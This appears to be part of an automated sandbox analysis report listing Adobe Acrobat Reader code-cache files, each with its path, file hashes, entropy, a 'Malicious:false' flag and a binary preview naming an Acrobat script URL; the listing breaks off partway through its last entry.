                                                                                            SHA-512:1C83A2991F80DB85B65E5D062E4B7B757D7E8210C71DF3CFA9BD046C0C9A6150191DD8960D8B01C252A4675B990CEE4DA2DE6A0015DD95D9811DE56BDF3C2DF8
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......3....<lb...._keyhttps://rna-resource.acrobat.com/base_uris.js ..&..|1/....."#.DM.3AJm.A.A..Eo......j.Y..........y...L<?W.Xi..A\Q3...J.}...d..~G.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\39c14c1f4b086971_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):212
                                                                                            Entropy (8bit):5.601323454154048
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mGpYOFLvEWdzAAuBtjtl/Gm0bbsIDMGH41:XfRM3tjHVKsIZ
                                                                                            MD5:047B80FAC86200220C563225948D1BD1
                                                                                            SHA1:780474F443EE7F2650692163AF58C1A06AFC4303
                                                                                            SHA-256:F10AD0943AA128ACC790CB400B1EF646FBC6D2DD04ADBE717F7EE0616B32691A
                                                                                            SHA-512:EADFD2F17F8457D78A4196C380A94A157BE71DA598A2F71C31E2C03FD42D3A8FBB1EDEA5AD7786EAEC486CCD56898FE5987954319A1A287AD531FC52969F7AAC
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......T....,.^...._keyhttps://rna-resource.acrobat.com/static/js/plugins/walk-through/js/selector.js .s...|1/....."#.D...AJm.A.A..Eo....................`.....^....L>..Xa./......C.y.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\3a4ae3940784292a_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):214
                                                                                            Entropy (8bit):5.487536186597005
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:m4fPYOFLvEWdtuGtkatQYBby0zBUKSAA1:pRptka+YBb
                                                                                            MD5:F76471EA17E04BAA5ACDAC5872A1A44B
                                                                                            SHA1:22F7989471E3B70CD4CA41950780C945E11A70B3
                                                                                            SHA-256:E6E287A79048F555E39CA6AB9D9C250DA929523F44C1569EEF6ED8A03013BE5A
                                                                                            SHA-512:7805C7A0A77F2C8DC7C2B0FB09150DE25DD82CD894AFD32683089F4A30FA36EB9DA32E982D1D8A77A17C51B560890703C722F7CB6558E33E572A682E53DC9F6D
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......V..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/search-summary/js/selector.js .E1..|1/....."#.D%v.CJm.A.A..Eo..................Q..E.=....=h`t..t..3%A.F$..w..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):177
                                                                                            Entropy (8bit):5.504847142449123
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+l64HXlA8RzYOCGLvHkjXMLOWFvSEltTwvAqMkt3tkd1dn76KohyP5m1:md4HXXYOFLvEjMSWFvzsoQt3GjUdyP41
                                                                                            MD5:46A69AEF0DD9C3E7DA0B3135C3B6F6DE
                                                                                            SHA1:91F9701BC26CCF77BC7B8AC7FAD5DB5078CBBE91
                                                                                            SHA-256:74B975993584F52DD484B565E1B10FE277DD24501D489AD963757EBF8ADB2E36
                                                                                            SHA-512:89ED3ED32EB73EFC9AE0DF8BCEFC94055540FAD77FAB4D8235A7CF2E22ED9B935FD3A8A0E40ACFBF2BA89A7371BBF3284D48C57626E01BC731C4E5A700EDB887
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js ..$..|1/....."#.D..3AJm.A.A..Eo.......,...........PU ....t^.....a.k..u.7.M.BW6#}..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):187
                                                                                            Entropy (8bit):5.573337297854372
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lpSUlIv8RzYOCGLvHkWBGKuK2fKVLwA45hdZmA0hMktVWRUPqf9tsDMaPV44m1:mkl9YOFLvEWsfOLwAcLZmLjtvPqVyM+e
                                                                                            MD5:CB0E82BD9491F8988226B5F802E6A387
                                                                                            SHA1:3DA9A2E8E8FFDDC1DA960332D8971B36896AF167
                                                                                            SHA-256:0482EADBBA608096C1FD4AB5D3B0A52824095F6BA62C29FAC6744919DB44FC08
                                                                                            SHA-512:3FCD3CB64C935A65782448955623BED7BB30D00FAAF4AE3CF47DC273B9C65DD80FB74D09977948CC1EBFBC3B297C660543D3A9286822FE82A2ABDCACB4783351
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......;...I......._keyhttps://rna-resource.acrobat.com/static/js/desktop.js .....|1/....."#.D.x.AJm.A.A..Eo......<U............q.O...j....._y..L^z...?..@N..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):244
                                                                                            Entropy (8bit):5.589320292466083
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mt9YOFLvEWdVFLBKFjVFLBKFlybqeaIQfatZgtwSeKaT9pr1:URVFAFjVFAFQqeaIQfa7gtwSeKaTL
                                                                                            MD5:00E04BC568402D1F373FFFBAE39E9836
                                                                                            SHA1:776D9CB0AA1AA70826AC085B717F37548A6E236B
                                                                                            SHA-256:055336E3074CB7424BB2C132549198FDB48F7AD7011E62A0165767BC708D724B
                                                                                            SHA-512:A1BB7EC7CB76753252E0286343F7FCAB8A81AC8AC0AA6E1D644F4857F10646DF5E324650A37C3ECAC9D175701545559F9B79FD1A972B54384A4936F3B13052A2
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js ..Z..|1/....."#.D..fCJm.A.A..Eo......-................H...{...2../.k`..r4.C. .A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6267ed4d4a13f54b_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):210
                                                                                            Entropy (8bit):5.565683448958373
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mq9YOFLvEWdzAHdQkq27k9tTlqt5GFCaa+41:NRMHdvqV96t5Gda+
                                                                                            MD5:C85ACB6AE74DF43E29CC8EF31E1D74C4
                                                                                            SHA1:21E3778CE135969E772AEECE86A7A78A594CC2EF
                                                                                            SHA-256:2478661F9C043B377BB9574B30A975C7EE8E2645E41A5B0AED190CFECE72091F
                                                                                            SHA-512:68D22A2B5B2980C415091752ADAA75606CB54AA31C0DB385BDACFA86435A8ED0EC9244D17D8C76870CDCFF53A2BC280F4B0D667554EB5268576243CCB9E6691E
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......R....L......_keyhttps://rna-resource.acrobat.com/static/js/plugins/walk-through/js/plugin.js .....|1/....."#.D.S.AJm.A.A..Eo.........M...........G.3D.....Q.g0...._.Q.........A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):211
                                                                                            Entropy (8bit):5.486410005447679
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:ms2VYOFLvEWdvBIEGdeXuD45rRGatV11:BsR2EseAcr/
                                                                                            MD5:5076EB624138BCB3F0C19816E21945BA
                                                                                            SHA1:B814C16E742AC3B77F4BA2841143D841FA1931E4
                                                                                            SHA-256:E588F4CD188BA54DADA3C13BF2F1B07A518B6D9A8E7B20594F09335950580BA6
                                                                                            SHA-512:F237982BBB0A6FBC80A74F5F2C45DD2AD71EB2F7A514A0CB3380C209E468FA26DFAA011C2F5391B770E26E6D165E8773EB8B1F6364AAB192283137E080603498
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......S...]......._keyhttps://rna-resource.acrobat.com/static/js/plugins/add-account/js/selector.js ..|..|1/....."#.D&S.BJm.A.A..Eo.......w|..........A.o]@r..Q.....<w.....].n\....A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):202
                                                                                            Entropy (8bit):5.5822913627631054
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:maVYOFLvEWdwAPCQ/v6HYatNxm7OhKlvA1:RbR16A6H3zxmJ
                                                                                            MD5:992E6FC1BF4FDE4E971B419C57220B54
                                                                                            SHA1:8E8F3DDA25148C9E9837F62DD4E10A22774BF916
                                                                                            SHA-256:DBCC5EE5FAD0E766BA901CB28448066A8A9725A6A92D4E64E3B1BEE6FA6EED83
                                                                                            SHA-512:F3A82C1B117AE30B400E8A429F0B081C95F9D832D34D90E595982AE1BCA91380F8602A3F283EBB072D18F23D0ECB8149DCB979E04A0C453DF80B2C495FE1FEAE
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......J......{...._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/plugin.js .b%..|1/....."#.D..OBJm.A.A..Eo....................4T].....Tw.....(..b...EO....9.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):211
                                                                                            Entropy (8bit):5.528696396448641
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lx2gv8RzYOCGLvHkWBGKuKjXKX7KoQRA/KWEKPWFvyvjlt2YoMktYD/PdF5Yud:ms2gEYOFLvEWdGQRQVuWX7atYjdFt1
                                                                                            MD5:49DDF7E0C4C0D1AB843F8AB37580B9B4
                                                                                            SHA1:2DB94B3404FDEF9FFEF567C4184B7C93A12CBBA4
                                                                                            SHA-256:2C480F931A23AD29D1589ECB2C8FC54C9C6D44C3FB75E838C870E0201561A2B4
                                                                                            SHA-512:52107D071E802D141B71C6F5D4658B3DB2486FD521A4292DB397F44D930460617748BDEABF57EC2A17A263A59C878E0A62C580A2E54E079830FF8F1EBC02DF3C
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......S...W.%z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/selector.js ..o..|1/....."#.D}..BJm.A.A..Eo.......b.<........@..{o]...9o|..qY....T....{..u.b..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):206
                                                                                            Entropy (8bit):5.534418225427948
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mzyEYOFLvEWdrIOQUTkmIG9jt2Et1S/1:WyeRlLRB9jQEt1
                                                                                            MD5:C374C707FDA20D6F39A177A93918B31A
                                                                                            SHA1:A1F2CA11DFDC561AE088BE763AAEB42E9902DE8A
                                                                                            SHA-256:3BBB3075E453F78783E83B4118DF8C116A806FF8FBC7C5F3044C3C29F213209E
                                                                                            SHA-512:3492430D10BF20273F7B1006B1FC02E92B54328E15DAC945EF50B261069EF0216889DA6417C76AFB625E680E5D38E4BF2FBC76E38169D039C9A7DA3CC7528BA3
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......N..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/plugin.js .....|1/....."#.D.z.AJm.A.A..Eo.......|mb.........t\a......x5.'OuE.C..@......x..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):218
                                                                                            Entropy (8bit):5.544963313983021
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mnYOFLvEWdhwyugGE0xdathylwrqwK+41:wRhxGE6QuqGwK+
                                                                                            MD5:FE7F6F152AE4A9BD31A4ACD631380279
                                                                                            SHA1:612C4D0B729BD89CBD28140A9F2314CC18B61CB6
                                                                                            SHA-256:FE6D8843C873D75BA9FEA095E1839B45D63F0E5E9ACB9A552F4ED161B074F201
                                                                                            SHA-512:87908CD12A602F5918D9727CA22EB8FFCA93B7B4428E9528A47D5B89BDFB84B3AB37E8434977C9E7D21DAF616CDAD8E44B82E9A8967F94CF8336B0FB7BB009B9
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......Z.........._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/selector.js .^#..|1/....."#.D.~7BJm.A.A..Eo.........0...............7...o..a=.98I......(3.$G.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):230
                                                                                            Entropy (8bit):5.571479876581485
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mYXYOFLvEWdrROk/RJbu2kK1uPtg4fO441:/RrROk/X1yu4fL
                                                                                            MD5:1D8B2D5A5549D28B09CDE9F1AC431F14
                                                                                            SHA1:0EB449C08F5AF7B2339CCD3B9AEAEE6A11831AD5
                                                                                            SHA-256:86712C1BA8E71FC6F3DCD5C3CEA81BAA237738EB1A0BA61E1C330BDEA6095099
                                                                                            SHA-512:634A91D9A293345AFDE01D8DCDA234A6264A6E56E1618EAC4CD8A5A81E9A3012C4F28557004EEE5A8AE1196A1403E900113DC3FD06B9CBC15D673447798F8CD3
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......f...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/selector.js ..>..|1/....."#.DL..AJm.A.A..Eo......y.2...........~..rw.+[....!.)?..f.U..(=.=.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):186
                                                                                            Entropy (8bit):5.535047546351228
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lhD4ll08RzYOCGLvHkWBGKuKdTSVr+XVmI9k9hMkttf/HzoIN1OFPL4m1:mmDEYOFLvEWXIr+XVmB9jtlfzV1QPLr1
                                                                                            MD5:30722F754F3CDDDE392ED0FFC1F90D4B
                                                                                            SHA1:41CB31617EB98FFE73B9BBF10AC52B77838CE4AA
                                                                                            SHA-256:FFFE14147EB13F372F9C40289398A82349FB48D9BBDAF87428E5401B6B3728BE
                                                                                            SHA-512:88B63D6F0D670454B6053F3AEA51EC49CE1C2F2A8E048D69B57C02E9E82135A0E9389969E27BE3AB80CDCF3C0529F760B7A9CF9C8633890F6EDC1BFD558C27BF
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......:....f......_keyhttps://rna-resource.acrobat.com/static/js/config.js ....|1/....."#.D?p.AJm.A.A..Eo.......~)@..........~]...%s..<...n.f..<.....1#..U..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):207
                                                                                            Entropy (8bit):5.586690995321149
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+l+nq1A8RzYOCGLvHkWBGKuKjXKLNfKPWFvfMtAMslfoMktVlm8D6EsEJeUm1:m52YOFLvEWdMAuFEAMsdatVUEvsEJ41
                                                                                            MD5:BCF103C5AC9174C832BB22A2B567B9F2
                                                                                            SHA1:F144BB0C22CE600EB1F50ED0A8DB25970FA7294E
                                                                                            SHA-256:42479DED7B5DA7D88CEAB5D774C759921F1C21BF46EAB82DF47064AEEF268C0B
                                                                                            SHA-512:0840DD056B0F62F4794043D40AF73604DDA4978AC1EAC5D7CB05A80ECF4F043EBC784ED62430E25316765FB481D43C5589432AFBAE0CEE7355B6B97605F79B50
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......O...a.Y....._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/selector.js .~...|1/....."#.D..ICJm.A.A..Eo........5s..........z._a...'.v.......4p3..1.']...A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):210
                                                                                            Entropy (8bit):5.538713843032575
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lf1UldA8RzYOCGLvHkWBGKuKjXK9QXAdWKfKPWFveathfAdoMktZqFoDb7T2/1:mYilPYOFLvEWd8CAdAu0ehfQat6ong1
                                                                                            MD5:19163C5DBFA4657ECC755242436D5957
                                                                                            SHA1:46D116BF03480508F3281F6B7335E511C350960A
                                                                                            SHA-256:10F3B78B36AAF14B92FB5BFE2524497E5E9F5FE50EC63D4FA1584C552CBE81B7
                                                                                            SHA-512:75CB30388883FBFF2DB397582D733F97AAFF16E19C6636C1FD42BF5F5B18133D983BD67F47488CBCDBF7BCE813326AC47BE6C928007D61B7AF4D0843FFC186A2
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......R....|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js .....|1/....."#.DFy.BJm.A.A..Eo................c}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):223
                                                                                            Entropy (8bit):5.5638521345703325
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mY8nYOFLvEWdrROk/IuXH0qebtM5dN16wG1:F8hRrROk/9H0qebW
                                                                                            MD5:27B3B86BA568526A0BD9CD06EBD37459
                                                                                            SHA1:9663D225182113C982CCF45BC8CE1B458984AA10
                                                                                            SHA-256:2DEDBD6ED1D5DDA82387982B151B72913DA424828E9B016E9BD8388382199A54
                                                                                            SHA-512:F66283A565E6B8C4B6690552A3EC17C3A1CA1CD10DAE1133D89EA10A36E143BD1A679183601684889EB933B8B5DECF408DF039C3894869C585B6895078A8555B
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......_...h......_keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/selector.js .....|1/....."#.D...AJm.A.A..Eo.......(............%.k.SZ..~W.....:)'B..ad......A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):213
                                                                                            Entropy (8bit):5.621925224869287
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mLrnYOFLvEWdrIoJUQJjeRvPtQQeJIi1:ehRcajeRvP5eJI
                                                                                            MD5:7AFD531D3CFF9E2D739BE5296BEFDB33
                                                                                            SHA1:D62B247C407636AB40A30D8BDB6A959BDFE1323C
                                                                                            SHA-256:3559FFBEF0F9A6281984DBE97BD4918B626CAB619DBBEF139D3D579F29E59561
                                                                                            SHA-512:4791BE163E737DB0EAC551E84E3A26A5EFE3FD29CE0FA3C629CF34D6601D039EF5234243A6BA6503F6AFA836C5F0D79AD5C5CC1527ACF185A2B67EE10799A4E9
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......U..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files-select/js/plugin.js ..a..|1/....."#.DF..AJm.A.A..Eo.......r..........;"./N_.,.:C..2....9L.H...3:...A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):208
                                                                                            Entropy (8bit):5.546907727168277
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lQ/pqv8RzYOCGLvHkWBGKuKjXKX+IALKPWFvBU+XBYMktCWn6mgmOZLhT7Um1:mOEYOFLvEWdrIhuI+XUtbzgm2d/1
                                                                                            MD5:F447E9572669A4E45999EA2A3DB97846
                                                                                            SHA1:C367FC4D163DCB4F6ACAB3B3000D5CC376542C49
                                                                                            SHA-256:21ECFE9E824AE702B54E9EBBA85014E3025A1DE8D65B7B070BFDAB6F9D9A771F
                                                                                            SHA-512:4FD3C3D17807D89A18D1825540AD8AD5327751620A944DDEB8873DA8A4B4D96863E53111D7C7690A1E50D5360050B8C5EC9D83E492925A51E9DB2D426C6EBC5B
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js ....|1/....."#.DB..AJm.A.A..Eo......*..I........Z.Z}Q..4.o....0+..[|..n:*..U.W.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):188
                                                                                            Entropy (8bit):5.572329118833723
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+l8UElLA8RzYOCGLvHkWBGKuKPK7Cv2xlXVk9hMkttLllEBiaQ562HvpMm1:mAElVYOFLvEW1Kpx1O9jttRrx56uvp1
                                                                                            MD5:59BB6F7C29C91DE7B246D01E6A0EED9A
                                                                                            SHA1:8753417C85513B236977CE8BAE0918480B8E5C45
                                                                                            SHA-256:C1AF21948A4877FC6C02B822B5A1B094C2411E41DF24CDBB20286170C8584C57
                                                                                            SHA-512:1DA8A76E2B6A4EC1FB4F31C3359639F8DBB05789CD79F3FC5E5B95C27F62F1072B35296863FF64E79DE66C0DE3E41BC05E2FEEE9F2C95A02BEB25C8798B26672
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js .M...|1/....."#.D..tAJm.A.A..Eo.......~..........z?...SwC...^..y.....V..7R-O.....A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):214
                                                                                            Entropy (8bit):5.6199063609054765
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mWYOFLvEWdBJvvuZ5E4atKlUDLYtmOZn1:xRBJeUkODcFZ
                                                                                            MD5:14EFE097D0F13F614D8C98F5FC1581AD
                                                                                            SHA1:2456105114192DA6B5DD1B48F62543EFB70262CF
                                                                                            SHA-256:3CDCBEC2BD954EF42CD0E2B38189AD7749EDB63ECBA9B7C39BFD92C5AF6D10F1
                                                                                            SHA-512:46E04737CF09ED5CBB2D08A2E82F9CF37291FE39729F09835A48CD6E4D29430BAD042BC646FFAB4439222E0679B325C6B9D1E9800E0AFBA0E7626542D5004900
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......V.....h....._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/selector.js .....|1/....."#.D...BJm.A.A..Eo......N9..............t.q..W.EZ....1...[.zC.7mD..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):211
                                                                                            Entropy (8bit):5.535733828085143
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lxCq//6v8RzYOCGLvHkWBGKuKCH6U4LJzWHK7WFvk0qat3+9Mkt0AlnpSKGoS6:msRPYOFLvEWIa7zp7q3itrt8VPu1
                                                                                            MD5:D34964488831106CFC2136E21538F473
                                                                                            SHA1:F918DFAD52091DA9A2E383A6C74BF033E625FEE7
                                                                                            SHA-256:7EDB43D1869951E9FCB6A96A5E8E8BFA3622825021CF2D2B5456508E9DEE9A75
                                                                                            SHA-512:72E4F9A8385F7FCB86DA5B72133BF0D216BFF483A95AE254329F3707118D70C360A016350F8795A57F336D283BCB1813CBBD1FD0A77D8899EC6178FD0D437446
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js .,(..|1/....."#.D..JAJm.A.A..Eo........L............L...Im.@.........E.nW...IP..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf0ac66ae1eb4a7f_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):208
                                                                                            Entropy (8bit):5.590450154760217
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lQi9lC8RzYOCGLvHkWBGKuKjXKVRNUpXKLuVTaT1sx9doMktJD396F4XVAZ+89:mKPYOFLvEWdENU9QpOfatJowiM3Y1
                                                                                            MD5:1C7010F2B6419DC6DC4B8926E0D2AA1F
                                                                                            SHA1:AECC4F1068010E87F75F5400203578C872F78084
                                                                                            SHA-256:1E3B7C0B406D07AE83B82233CAA89218B8EED9A7F3D732B612D7AC07875F95DB
                                                                                            SHA-512:681CFC81B85B6C1717E4946BA49F2771718D300E2A1DDC9F500A8418852BDBCD39823D887A4CD3336B78C17804CE7C7A8418987E51FB5673EEB1DD8734E692A6
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......P...Yft....._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/plugin.js ._...|1/....."#.DE.}BJm.A.A..Eo......)@%f...........M....m+lS..e.....<7.U.P8*.0K.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):208
                                                                                            Entropy (8bit):5.575808897271674
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mQt6EYOFLvEWdccAHQmFmYatE1jBRCh/41:XRc9BPaK1Di/
                                                                                            MD5:9153B22AAF414309CC6CCCD3BD16DBDC
                                                                                            SHA1:9E042B744034381D212D3D329C66FFAF82C9F0A3
                                                                                            SHA-256:5548CE1DFFB23CCE3367BD9D2F40DF2D38E550A38A0B5FB7982043F4FCE40E6D
